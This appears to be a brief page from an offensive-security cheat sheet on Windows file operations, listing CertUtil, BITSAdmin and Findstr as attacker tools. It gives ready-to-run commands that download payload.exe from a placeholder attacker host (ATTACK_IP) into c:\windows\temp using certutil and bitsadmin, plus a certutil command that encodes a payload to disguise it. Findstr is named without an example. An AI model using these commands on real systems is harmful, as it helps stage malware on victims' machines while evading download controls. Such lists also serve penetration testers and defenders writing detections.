search
githubEdit

File Operations

hashtag
Tools: CertUtil, BITSAdmin, Findstr

hashtag
Examples:

hashtag
CERTUTIL

1)

certutil -URLcache -split -f http://ATTACK_IP/payload.exe c:\windows\temp\payload.exe

2)

certutil -encode payload.exe Encoded-payload.txt

hashtag
BITSADMIN

1)

bitsadmin.exe /transfer /Download /priority Foreground http://ATTACK_IP/payload.exe c:\windows\temp\payload.exe
PreviousFile ExecutionNextResources

Last updated